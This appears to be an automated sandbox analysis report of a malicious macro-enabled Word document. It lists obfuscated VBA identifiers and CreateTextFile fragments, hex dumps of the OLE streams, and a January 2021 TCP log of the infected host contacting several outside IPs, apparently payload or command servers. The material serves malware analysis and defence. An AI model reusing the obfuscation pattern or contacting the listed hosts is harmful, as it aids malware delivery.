                                              "nJJzFRjEWpRikxCD"
                                              ANzGyzCD
                                              MmSDYCkJR
                                              "hKlajOujwgDFAA"
                                              "eeVVJBMGlcfXMB"
                                              RqlOZAHRJ.CreateTextFile("HQGixyC:\vETCeBG\zIuEqsGG.NobmDA")
                                              iHKuDmaEr:
                                              "CcDmClHsnCC"
                                              "UjBKOEDRIbiWFB"
                                              QOrvJEB
                                              "sxbwAfRtWJI"
                                              UskmBJF
                                              "KqVyuQQfwTWh"
                                              tpOgXmm
                                              fiyQuiRBI
                                              gphNDVZp
                                              vEBqHrDnD
                                              PbhYVsA.Close
                                              ZMdrVHGz.Close
                                              "vVbvIHcFGEAJJ"
                                              CFdSBD.CreateTextFile("HWdKFJOBf:\UYiqcEIJ\rLoNox.YKOSA")
                                              KmGOADt
                                              Resume
                                              phIwFD
                                              jPJENIo
                                              AiRdGDAJ
                                              KmGOADt.Close
                                              "]an"
                                              PnolTIbAB
                                              "eEWdaDQVJJqTHgF"
                                              gxBPJB:
                                              eepvDEaE.CreateTextFile("KlvicF:\bJfMJhqw\dAgvkWD.xDxpHH")
                                              FYVZFEH
                                              tzErBRFe
                                              "LvnHAGHfIhRDBRAF"
                                              NuebA:
                                              sTzDC.CreateTextFile("OBoYzRpef:\sDLuJ\bmIQSG.MdmDR")
                                              oQgLUI
                                              SblcDCC.Close
                                              HCvCmAcHC
                                              "eXpjHFapHaPdRJu"
                                              eepvDEaE
                                              "DBvMcNtCcMyJDDI"
                                              MHYlQAD
                                              "ekluIEBJFIgoBcGC"
                                              dXiwA
                                              "MiCjaGqJfPrI"
                                              eCIzUDyJ
                                              RyDBDK
                                              hFSyAfFrF
                                              "fDdPHEjBEnAdZqZFJ"
                                              zxgLHJSFW.CreateTextFile("KGGMcAB:\uaMWhFR\mhdIDlEH.PDxHAHD")
                                              "MxCpGaGqBgemCAFEJ"
                                              PcHRGIADo.CreateTextFile("OiBXGJB:\pnqsZEDV\gsZoAW.EePnB")
                                              sCOIGDtD.Close
                                              uWZkeMFv
                                              gzTFLxb
                                              IePCGy
                                              swNGWdd
                                              qHKYGHlFA
                                              OIbfvEEFF
                                              CHVmaVC
                                              ZMdrVHGz
                                              TXmxvp
                                              quDoH
                                              iHKuDmaEr.WriteLine
                                              KXTliE
                                              ddanFDWJf
                                              rJEkbLH
                                              fNhiCVgGS:
                                              noebIvSiu
                                              YZllAeRe
                                              VB_Name
                                              "eXObOTlBAITEOIo"
                                              mgrwfmN:
                                              LzxxRHG
                                              inIcjJtaF
                                              EKmLA
                                              uVItICICB
                                              mgrwfmN.WriteLine
                                              KXwaABT
                                              fDZVKAAc.Close
                                              Mid(Application.Name,
                                              fmwdEMADQ
                                              lBenBDA
                                              SblcDCC
                                              mgTNFCq
                                              NuebA.WriteLine
                                              hXxQDACJA
                                              KmGOADt.WriteLine
                                              HCvCmAcHC.Close
                                              yJmmmVIAG
                                              rYbgBh:
                                              iHKuDmaEr.Close
                                              NuebA.Close
                                              hZCth.CreateTextFile("fYRUCAB:\VWWOMB\QmLUE.hKgcGBDCJ")
                                              ZMdrVHGz.WriteLine
                                              OlapGi
                                              zDsRaIBGF.CreateTextFile("NFKiIDO:\sBRpIz\FFqJD.QevLKGfGs")
                                              "CVbRCAAhkhmcDG"
                                              HCvCmAcHC:
                                              BNmrm
                                              rYbgBh
                                              "WNFUDvHgghFdup"
                                              uRnkDGJ
                                              "qiXBsMBsLJGbX"
                                              yabVbA
                                              zBSWCKmJv
                                              bbsIZ
                                              "zdTcdOoXXUFHJK"
                                              xsruLB.CreateTextFile("EEnWBhBO:\VaTRC\McdbPkJ.cvwiQ")
                                              RqlOZAHRJ
                                              fNhiCVgGS.WriteLine
                                              hjZwD
                                              "EgxfIDVQbJotWhj"
                                              "BUUJYAAIoJvLBLAo"
                                              PcHRGIADo
                                              wTMSLyWFG
                                              sCOIGDtD
                                              PbhYVsA:
                                              "BndJDkuVYF"
                                              KmGOADt:
                                              "RhnJRGeBNASBQHHGF"
                                              anyPG
                                              "JTSPCDjykfL"
                                              sreXHFD
                                              "XrrAwQZPjqB"
                                              hoyzuBGCP
                                              UavHTIBHo
                                              qAUhkIMz
                                              EKezHIC
                                              PjNhJNA
                                              GznGGHyG
                                              UwyYSBsBN
                                              ORLICIl
                                              cwsTFPCH
                                              "]anw["
                                              drZcHkCm
                                              hDJDJ
                                              NXbmIuHX
                                              Function
                                              "syYTHJShrguhzb"
                                              AioOpBFE
                                              xiFRA
                                              fmwdEMADQ.WriteLine
                                              gxBPJB.Close
                                              NZiApKAp
                                              gEcrV.Close
                                              "mehEFPFHcklgJDDx"
                                              iHKuDmaEr
                                              pULquU
                                              SblcDCC.WriteLine
                                              pkixJADG:
                                              xkQqDXCcD
                                              GIAKA
                                              "TubioGUTLadgXbA"
                                              "anBQXljzGenE"
                                              xLQtMd.CreateTextFile("RyteBlQC:\fuQXAW\oueKCbIJ.WivEYJD")
                                              fDZVKAAc
                                              ecGmY
                                              "ptABFEZDmkMVIeD"
                                              "TBKmUCEXTUIGu"
                                              "fxSJajCGlWUEBW"
                                              rYbgBh.WriteLine
                                              DhnHIY
                                              sCOIGDtD.WriteLine
                                              tAmQHxlD
                                              tzErBRFe.CreateTextFile("RcEcpI:\TGsCxLC\hxAZEBGHI.oETVAFo")
                                              "wypNISsWSXthFJCq"
                                              eLmLDU
                                              jENfzNH
                                              gEcrV.WriteLine
                                              Nothing
                                              "uTtCAFwHpCGF"
                                              PbhYVsA
                                              gEcrV
                                              NuebA
                                              "aqGiHISIbAoabV"
                                              fNhiCVgGS.Close
                                              jsYAGBJAF
                                              RhztCF
                                              lADFBaJ
                                              FUyIHBDFz
                                              sPkIwu
                                              ViWsSIH
                                              gxBPJB.WriteLine
                                              zZuzBZGD
                                              pkixJADG.WriteLine
                                              MznOjBB
                                              fmwdEMADQ.Close
                                              sTzDC
                                              "oLweAMoGsqVE"
                                              diCXTi
                                              GfRPP.WriteLine
                                              Error
                                              uWZkeMFv:
                                              xPBGH
                                              Attribute
                                              sySRJ
                                              "WLXLJnjItPGPZJ"
                                              "JMgUDAIEJlgyNBH"
                                              jzqBlGW
                                              CFdSBD
                                              pkixJADG.Close
                                              ibIiBF
                                              "qDaYIDDSZQMTaO"
                                              pkixJADG
                                              GfRPP:
                                              LQqlBAHD
                                              dLRiF
                                              "ImJJdfAtdFHCh"
                                              PbhYVsA.WriteLine
                                              DkLoDL
                                              RjiQHRA.CreateTextFile("CxQnJUo:\GongJKJ\vntyZI.ugzmBCOCC")
                                              fNhiCVgGS
                                              fmwdEMADQ:
                                              rYbgBh.Close
                                              zxgLHJSFW
                                              HCvCmAcHC.WriteLine
                                              hZCth
                                              VBA Code
                                              VBA File Name: Zdjtk46nm17voo, Stream Size: 701
                                              General
                                              Stream Path:Macros/VBA/Zdjtk46nm17voo
                                              VBA File Name:Zdjtk46nm17voo
                                              Stream Size:701
                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . # . . . . . . . . . . . . . . . I . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                              Data Raw:01 16 01 00 00 f0 00 00 00 1c 02 00 00 d4 00 00 00 88 01 00 00 ff ff ff ff 23 02 00 00 83 02 00 00 00 00 00 00 01 00 00 00 49 85 8d 23 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                              VBA Code Keywords

                                              Keyword
                                              Attribute
                                              VB_Name
                                              VBA Code

                                              Streams

                                              Stream Path: \x1CompObj, File Type: data, Stream Size: 146
                                              General
                                              Stream Path:\x1CompObj
                                              File Type:data
                                              Stream Size:146
                                              Entropy:4.00187355764
                                              Base64 Encoded:False
                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . F . . . . . . . . M S W o r d D o c . . . . . W o r d . D o c u m e n t . 8 . . 9 . q @ . . . . . > . : . C . < . 5 . = . B . . M . i . c . r . o . s . o . f . t . . W . o . r . d . . 9 . 7 . - . 2 . 0 . 0 . 3 . . . . . . . . . . .
                                              Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 06 09 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 00 00 00 00 0a 00 00 00 4d 53 57 6f 72 64 44 6f 63 00 10 00 00 00 57 6f 72 64 2e 44 6f 63 75 6d 65 6e 74 2e 38 00 f4 39 b2 71 40 00 00 00 14 04 3e 04 3a 04 43 04 3c 04 35 04 3d 04 42 04 20 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 20 00 57 00 6f 00 72 00 64 00 20 00 39 00 37 00 2d 00
                                              Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096
                                              General
                                              Stream Path:\x5DocumentSummaryInformation
                                              File Type:data
                                              Stream Size:4096
                                              Entropy:0.280929556603
                                              Base64 Encoded:False
                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . h . . . . . . . p . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . } . . . . . . . # . . . . . . . . D . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                              Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 f4 00 00 00 0c 00 00 00 01 00 00 00 68 00 00 00 0f 00 00 00 70 00 00 00 05 00 00 00 7c 00 00 00 06 00 00 00 84 00 00 00 11 00 00 00 8c 00 00 00 17 00 00 00 94 00 00 00 0b 00 00 00 9c 00 00 00 10 00 00 00 a4 00 00 00 13 00 00 00 ac 00 00 00
                                              Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 508
                                              General
                                              Stream Path:\x5SummaryInformation
                                              File Type:data
                                              Stream Size:508
                                              Entropy:3.93936573804
                                              Base64 Encoded:False
                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . l . . . . . . . T . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . . . 0 . . . . . . . 8 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . N o r m a l . d o t m .
                                              Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 cc 01 00 00 11 00 00 00 01 00 00 00 90 00 00 00 02 00 00 00 98 00 00 00 03 00 00 00 6c 01 00 00 04 00 00 00 54 01 00 00 05 00 00 00 a4 00 00 00 06 00 00 00 b0 00 00 00 07 00 00 00 bc 00 00 00 08 00 00 00 40 01 00 00 09 00 00 00 d0 00 00 00
                                              Stream Path: 1Table, File Type: data, Stream Size: 6412
                                              General
                                              Stream Path:1Table
                                              File Type:data
                                              Stream Size:6412
                                              Entropy:6.14518057053
                                              Base64 Encoded:True
                                              Data ASCII:j . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . > . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . .
                                              Data Raw:6a 04 11 00 12 00 01 00 0b 01 0f 00 07 00 03 00 03 00 03 00 00 00 04 00 08 00 00 00 98 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00
                                              Stream Path: Data, File Type: data, Stream Size: 99192
                                              General
                                              Stream Path:Data
                                              File Type:data
                                              Stream Size:99192
                                              Entropy:7.3901039161
                                              Base64 Encoded:True
                                              Data ASCII:x . . . D . d . . . . . . . . . . . . . . . . . . . . . / g . , b . r . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . j . . . . . . . . . . . . . . . . . . . c . . . 8 . . . . A . . . . ? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8 . A . C . = . > . : . . 1 . . . . . " . . . . . . . . . . . . . . . . . . . . . . . R . . . . . . . . . % . . P . 5 . . w . ? . . . . . . . . . . . . . . . D . . . . . = . . F . . . . . . % . . P . 5 . . w . ? . . . . . . . . . . .
                                              Data Raw:78 83 01 00 44 00 64 00 00 00 00 00 00 00 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 2f 67 eb 2c 62 01 72 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0f 00 04 f0 6a 00 00 00 b2 04 0a f0 08 00 00 00 01 04 00 00 00 0a 00 00 63 00 0b f0 38 00 00 00 04 41 01 00 00 00 3f 01 00 00 06 00 bf 01 00 00 10 00 ff 01 00 00 08 00 80 c3 14 00
                                              Stream Path: Macros/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 524
                                              General
                                              Stream Path:Macros/PROJECT
                                              File Type:ASCII text, with CRLF line terminators
                                              Stream Size:524
                                              Entropy:5.52955915132
                                              Base64 Encoded:True
                                              Data ASCII:I D = " { 9 1 6 F 7 B 9 1 - 5 D 2 F - 4 2 F E - 8 5 A 0 - A 5 1 0 E E 1 5 7 0 3 4 } " . . D o c u m e n t = A 5 g d 2 1 k l f q u 9 c 6 r s / & H 0 0 0 0 0 0 0 0 . . M o d u l e = Z d j t k 4 6 n m 1 7 v o o . . M o d u l e = O w p p n p 8 h a h 4 x o 7 8 8 . . E x e N a m e 3 2 = " F b 5 d 3 b h _ _ k e _ c w 4 p 7 7 " . . N a m e = " m w " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " 2 4 2 6 E E C 5 1 6 F E 1 A F E 1 A F E 1 A F E 1
                                              Data Raw:49 44 3d 22 7b 39 31 36 46 37 42 39 31 2d 35 44 32 46 2d 34 32 46 45 2d 38 35 41 30 2d 41 35 31 30 45 45 31 35 37 30 33 34 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 41 35 67 64 32 31 6b 6c 66 71 75 39 63 36 72 73 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4d 6f 64 75 6c 65 3d 5a 64 6a 74 6b 34 36 6e 6d 31 37 76 6f 6f 0d 0a 4d 6f 64 75 6c 65 3d 4f 77 70 70 6e 70 38 68 61 68 34 78 6f 37 38
                                              Stream Path: Macros/PROJECTwm, File Type: data, Stream Size: 149
                                              General
                                              Stream Path:Macros/PROJECTwm
                                              File Type:data
                                              Stream Size:149
                                              Entropy:3.96410774314
                                              Base64 Encoded:False
                                              Data ASCII:A 5 g d 2 1 k l f q u 9 c 6 r s . A . 5 . g . d . 2 . 1 . k . l . f . q . u . 9 . c . 6 . r . s . . . Z d j t k 4 6 n m 1 7 v o o . Z . d . j . t . k . 4 . 6 . n . m . 1 . 7 . v . o . o . . . O w p p n p 8 h a h 4 x o 7 8 8 . O . w . p . p . n . p . 8 . h . a . h . 4 . x . o . 7 . 8 . 8 . . . . .
                                              Data Raw:41 35 67 64 32 31 6b 6c 66 71 75 39 63 36 72 73 00 41 00 35 00 67 00 64 00 32 00 31 00 6b 00 6c 00 66 00 71 00 75 00 39 00 63 00 36 00 72 00 73 00 00 00 5a 64 6a 74 6b 34 36 6e 6d 31 37 76 6f 6f 00 5a 00 64 00 6a 00 74 00 6b 00 34 00 36 00 6e 00 6d 00 31 00 37 00 76 00 6f 00 6f 00 00 00 4f 77 70 70 6e 70 38 68 61 68 34 78 6f 37 38 38 00 4f 00 77 00 70 00 70 00 6e 00 70 00 38 00 68
                                              Stream Path: Macros/VBA/_VBA_PROJECT, File Type: data, Stream Size: 5216
                                              General
                                              Stream Path:Macros/VBA/_VBA_PROJECT
                                              File Type:data
                                              Stream Size:5216
                                              Entropy:5.49741129349
                                              Base64 Encoded:True
                                              Data ASCII:. a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 1 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 7 . \\ . V . B . E . 7 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F .
                                              Data Raw:cc 61 97 00 00 01 00 ff 09 04 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 05 00 02 00 fa 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 31 00 23 00
                                              Stream Path: Macros/VBA/dir, File Type: data, Stream Size: 675
                                              General
                                              Stream Path:Macros/VBA/dir
                                              File Type:data
                                              Stream Size:675
                                              Entropy:6.39671072877
                                              Base64 Encoded:True
                                              Data ASCII:. . . . . . . . . . . . 0 * . . . . . p . . H . . " . . d . . . . . m . . 2 . 4 . . @ . . . . . Z = . . . . b . . . . . . . . . { . . a . . . % . J < . . . . . r s t d o l e > . 2 s . . t . d . o . l . . e . . . h . % ^ . . . * \\ G { 0 0 0 2 ` 0 4 3 0 - . . . . C . . . . . . . 0 0 4 6 } . # 2 . 0 # 0 # C . : \\ W i n d o w . s \\ S y s W O W . 6 4 \\ . e 2 . t l . b # O L E A u . t o m a t i o n . . ` . . . . N o r m a . l . E N . C r . m . . a . F . . . . . . . X * \\ C . . . . Q . m . . . . ! O f f i c
                                              Data Raw:01 9f b2 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 22 02 00 64 e4 04 04 02 1c 6d a2 a2 32 00 34 00 00 40 02 14 06 02 14 5a 3d 02 0a 07 02 62 01 14 08 06 12 09 01 02 12 7b 1a e4 61 06 00 0c 25 02 4a 3c 02 0a 16 00 01 72 73 74 20 64 6f 6c 65 3e 02 32 73 00 00 74 00 64 00 6f 00 6c 00 a0 65 00 0d 00 68 00 25 5e 00 03 00 2a 5c 47 7b 30 30 30 32 60 30 34 33 30 2d
                                              Stream Path: WordDocument, File Type: data, Stream Size: 21038
                                              General
                                              Stream Path:WordDocument
                                              File Type:data
                                              Stream Size:21038
                                              Entropy:4.09747048154
                                              Base64 Encoded:True
                                              Data ASCII:. . . . _ . . . . . . . . . . . . . . . . . . . . . . . . M . . . . b j b j . . . . . . . . . . . . . . . . . . . . . . . . . . . R . . b . . . b . . . . E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . F . . . . . . . F . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                              Data Raw:ec a5 c1 00 5f c0 09 04 00 00 f8 12 bf 00 00 00 00 00 00 10 00 00 00 00 00 08 00 00 19 4d 00 00 0e 00 62 6a 62 6a 00 15 00 15 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 19 04 16 00 2e 52 00 00 62 7f 00 00 62 7f 00 00 19 45 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00

                                              Network Behavior

                                              Network Port Distribution

                                              TCP Packets

                                              TimestampSource PortDest PortSource IPDest IP
                                              Jan 7, 2021 18:44:30.154597998 CET4916580192.168.2.22172.67.141.14
                                              Jan 7, 2021 18:44:30.200851917 CET8049165172.67.141.14192.168.2.22
                                              Jan 7, 2021 18:44:30.201436043 CET4916580192.168.2.22172.67.141.14
                                              Jan 7, 2021 18:44:30.203901052 CET4916580192.168.2.22172.67.141.14
                                              Jan 7, 2021 18:44:30.250072002 CET8049165172.67.141.14192.168.2.22
                                              Jan 7, 2021 18:44:30.344028950 CET8049165172.67.141.14192.168.2.22
                                              Jan 7, 2021 18:44:30.344073057 CET8049165172.67.141.14192.168.2.22
                                              Jan 7, 2021 18:44:30.344098091 CET8049165172.67.141.14192.168.2.22
                                              Jan 7, 2021 18:44:30.344122887 CET8049165172.67.141.14192.168.2.22
                                              Jan 7, 2021 18:44:30.344146013 CET8049165172.67.141.14192.168.2.22
                                              Jan 7, 2021 18:44:30.344171047 CET8049165172.67.141.14192.168.2.22
                                              Jan 7, 2021 18:44:30.344188929 CET8049165172.67.141.14192.168.2.22
                                              Jan 7, 2021 18:44:30.344202042 CET8049165172.67.141.14192.168.2.22
                                              Jan 7, 2021 18:44:30.344206095 CET4916580192.168.2.22172.67.141.14
                                              Jan 7, 2021 18:44:30.344218969 CET8049165172.67.141.14192.168.2.22
                                              Jan 7, 2021 18:44:30.344245911 CET4916580192.168.2.22172.67.141.14
                                              Jan 7, 2021 18:44:30.344253063 CET4916580192.168.2.22172.67.141.14
                                              Jan 7, 2021 18:44:30.344265938 CET4916580192.168.2.22172.67.141.14
                                              Jan 7, 2021 18:44:30.351722956 CET4916580192.168.2.22172.67.141.14
                                              Jan 7, 2021 18:44:30.397926092 CET8049165172.67.141.14192.168.2.22
                                              Jan 7, 2021 18:44:30.448654890 CET4916680192.168.2.22172.67.158.72
                                              Jan 7, 2021 18:44:30.494857073 CET8049166172.67.158.72192.168.2.22
                                              Jan 7, 2021 18:44:30.494976997 CET4916680192.168.2.22172.67.158.72
                                              Jan 7, 2021 18:44:30.495342970 CET4916680192.168.2.22172.67.158.72
                                              Jan 7, 2021 18:44:30.541374922 CET8049166172.67.158.72192.168.2.22
                                              Jan 7, 2021 18:44:30.559907913 CET8049166172.67.158.72192.168.2.22
                                              Jan 7, 2021 18:44:30.559976101 CET8049166172.67.158.72192.168.2.22
                                              Jan 7, 2021 18:44:30.560034037 CET8049166172.67.158.72192.168.2.22
                                              Jan 7, 2021 18:44:30.560090065 CET8049166172.67.158.72192.168.2.22
                                              Jan 7, 2021 18:44:30.560107946 CET4916680192.168.2.22172.67.158.72
                                              Jan 7, 2021 18:44:30.560132027 CET8049166172.67.158.72192.168.2.22
                                              Jan 7, 2021 18:44:30.560395956 CET4916680192.168.2.22172.67.158.72
                                              Jan 7, 2021 18:44:30.743870020 CET4916780192.168.2.22209.59.139.39
                                              Jan 7, 2021 18:44:30.763811111 CET4916680192.168.2.22172.67.158.72
                                              Jan 7, 2021 18:44:30.903764963 CET8049167209.59.139.39192.168.2.22
                                              Jan 7, 2021 18:44:30.903878927 CET4916780192.168.2.22209.59.139.39
                                              Jan 7, 2021 18:44:30.904099941 CET4916780192.168.2.22209.59.139.39
                                              Jan 7, 2021 18:44:31.064183950 CET8049167209.59.139.39192.168.2.22
                                              Jan 7, 2021 18:44:31.065102100 CET8049167209.59.139.39192.168.2.22
                                              Jan 7, 2021 18:44:31.065164089 CET8049167209.59.139.39192.168.2.22
                                              Jan 7, 2021 18:44:31.065221071 CET8049167209.59.139.39192.168.2.22
                                              Jan 7, 2021 18:44:31.065274954 CET4916780192.168.2.22209.59.139.39
                                              Jan 7, 2021 18:44:31.065277100 CET8049167209.59.139.39192.168.2.22
                                              Jan 7, 2021 18:44:31.065336943 CET8049167209.59.139.39192.168.2.22
                                              Jan 7, 2021 18:44:31.065383911 CET4916780192.168.2.22209.59.139.39
                                              Jan 7, 2021 18:44:31.065413952 CET8049167209.59.139.39192.168.2.22
                                              Jan 7, 2021 18:44:31.065474987 CET8049167209.59.139.39192.168.2.22
                                              Jan 7, 2021 18:44:31.065489054 CET4916780192.168.2.22209.59.139.39
                                              Jan 7, 2021 18:44:31.065553904 CET4916780192.168.2.22209.59.139.39
                                              Jan 7, 2021 18:44:31.065936089 CET4916780192.168.2.22209.59.139.39
                                              Jan 7, 2021 18:44:31.226799965 CET8049167209.59.139.39192.168.2.22
                                              Jan 7, 2021 18:44:31.441131115 CET4916880192.168.2.2245.130.229.91
                                              Jan 7, 2021 18:44:31.765343904 CET804916845.130.229.91192.168.2.22
                                              Jan 7, 2021 18:44:31.765746117 CET4916880192.168.2.2245.130.229.91
                                              Jan 7, 2021 18:44:31.765779018 CET4916880192.168.2.2245.130.229.91
                                              Jan 7, 2021 18:44:32.090040922 CET804916845.130.229.91192.168.2.22
                                              Jan 7, 2021 18:44:32.090152979 CET804916845.130.229.91192.168.2.22
                                              Jan 7, 2021 18:44:32.292649984 CET4916880192.168.2.2245.130.229.91
                                              Jan 7, 2021 18:44:32.460905075 CET49169443192.168.2.2245.130.229.91
                                              Jan 7, 2021 18:44:32.770035028 CET4434916945.130.229.91192.168.2.22
                                              Jan 7, 2021 18:44:32.770140886 CET49169443192.168.2.2245.130.229.91
                                              Jan 7, 2021 18:44:32.778253078 CET49169443192.168.2.2245.130.229.91
                                              Jan 7, 2021 18:44:33.087449074 CET4434916945.130.229.91192.168.2.22
                                              Jan 7, 2021 18:44:33.087608099 CET4434916945.130.229.91192.168.2.22
                                              Jan 7, 2021 18:44:33.087630033 CET4434916945.130.229.91192.168.2.22
                                              Jan 7, 2021 18:44:33.087855101 CET49169443192.168.2.2245.130.229.91
                                              Jan 7, 2021 18:44:33.096090078 CET49169443192.168.2.2245.130.229.91
                                              Jan 7, 2021 18:44:33.096921921 CET49170443192.168.2.2245.130.229.91
                                              Jan 7, 2021 18:44:33.405308008 CET4434916945.130.229.91192.168.2.22
                                              Jan 7, 2021 18:44:33.405762911 CET4434917045.130.229.91192.168.2.22
                                              Jan 7, 2021 18:44:33.405915976 CET49170443192.168.2.2245.130.229.91
                                              Jan 7, 2021 18:44:33.406655073 CET49170443192.168.2.2245.130.229.91
                                              Jan 7, 2021 18:44:33.715532064 CET4434917045.130.229.91192.168.2.22
                                              Jan 7, 2021 18:44:33.715612888 CET4434917045.130.229.91192.168.2.22
                                              Jan 7, 2021 18:44:33.715711117 CET4434917045.130.229.91192.168.2.22
                                              Jan 7, 2021 18:44:33.715851068 CET49170443192.168.2.2245.130.229.91
                                              Jan 7, 2021 18:44:33.719151020 CET49170443192.168.2.2245.130.229.91
                                              Jan 7, 2021 18:44:34.028208971 CET4434917045.130.229.91192.168.2.22
                                              Jan 7, 2021 18:44:34.041439056 CET4917180192.168.2.22210.86.239.69
                                              Jan 7, 2021 18:44:34.305519104 CET8049171210.86.239.69192.168.2.22
                                              Jan 7, 2021 18:44:34.305840015 CET4917180192.168.2.22210.86.239.69
                                              Jan 7, 2021 18:44:34.306168079 CET4917180192.168.2.22210.86.239.69
                                              Jan 7, 2021 18:44:34.569840908 CET8049171210.86.239.69192.168.2.22
                                              Jan 7, 2021 18:44:34.578701019 CET8049171210.86.239.69192.168.2.22
                                              Jan 7, 2021 18:44:34.578767061 CET8049171210.86.239.69192.168.2.22
                                              Jan 7, 2021 18:44:34.578810930 CET8049171210.86.239.69192.168.2.22
                                              Jan 7, 2021 18:44:34.578849077 CET8049171210.86.239.69192.168.2.22
                                              Jan 7, 2021 18:44:34.578888893 CET8049171210.86.239.69192.168.2.22
                                              Jan 7, 2021 18:44:34.578948021 CET8049171210.86.239.69192.168.2.22
                                              Jan 7, 2021 18:44:34.578979015 CET8049171210.86.239.69192.168.2.22
                                              Jan 7, 2021 18:44:34.579030037 CET8049171210.86.239.69192.168.2.22
                                              Jan 7, 2021 18:44:34.579071999 CET8049171210.86.239.69192.168.2.22
                                              Jan 7, 2021 18:44:34.579102039 CET4917180192.168.2.22210.86.239.69
                                              Jan 7, 2021 18:44:34.579128027 CET8049171210.86.239.69192.168.2.22
